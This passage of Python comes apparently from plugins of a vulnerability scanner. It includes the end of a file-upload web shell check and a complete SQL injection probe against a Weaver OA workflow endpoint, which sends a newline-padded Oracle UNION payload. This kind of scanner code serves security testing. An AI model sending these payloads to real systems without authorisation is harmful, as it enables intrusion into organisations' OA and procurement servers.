            # reported as arbitrary file upload.
            if code2 == 200 and con2.lower().find("testvul") != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # store the finding with the target host
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file; the target host is the file name, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the target and the failing plugin name
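def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for SQL injection in ``WorkflowCenterTreeData.jsp``.

    One POST is sent with a crafted ``formids`` field. A finding is reported
    when the reply is HTTP 200 and the lower-cased body contains all of the
    JSON keys ``"draggable":``, ``"checked":``, ``"id":`` and ``"text":``.

    Changes from the original:
      * ``resp`` was a module global, so overlapping scans could read each
        other's response and misattribute a finding. It is now local, and the
        never-assigned ``global resp2`` is dropped.
      * the bare ``except:`` also swallowed KeyboardInterrupt and SystemExit;
        it is narrowed to ``except Exception``.
      * the proxied and direct branches repeated the same request; they are
        merged (``proxies=None`` means no explicit proxy).

    NOTE(review): the four keys presumably also appear in an ordinary tree-data
    reply from this endpoint, so a hit shows that the request was accepted
    rather than that the query was executed. Confirm before reporting.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        ProxyIp: ``host:port`` of an HTTP proxy, or None for a direct request.

    Returns:
        ``str(info)`` of the finding on a hit, otherwise None.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        payload_url = scheme + "://" + url + ':' + str(port) + payload

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        # Built once and reused for the request and for the report text.
        formids = ('11111111111)))' + '\x0a\x0d' * 360 +
                   'union select NULL,instance_name from '
                   'v$instance order by (((1')

        proxies = None
        if ProxyIp is not None:
            # The proxy URL needs an explicit http:// prefix.
            # NOTE(review): only the "http" scheme is mapped, so requests to an
            # https target are sent directly and bypass the proxy.
            proxies = {"http": "http://" + str(ProxyIp)}

        s = requests.session()
        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        resp = s.post(payload_url,
                      data={'formids': formids},
                      headers=headers,
                      timeout=6,
                      proxies=proxies,
                      verify=False)
        con = resp.text.lower()
        code = resp.status_code
        expected_keys = ('"draggable":', '"checked":', '"id":', '"text":')
        if code == 200 and all(key in con for key in expected_keys):
            Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, formids)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            # Severity methods: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            web.High()
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the target and the failing plugin name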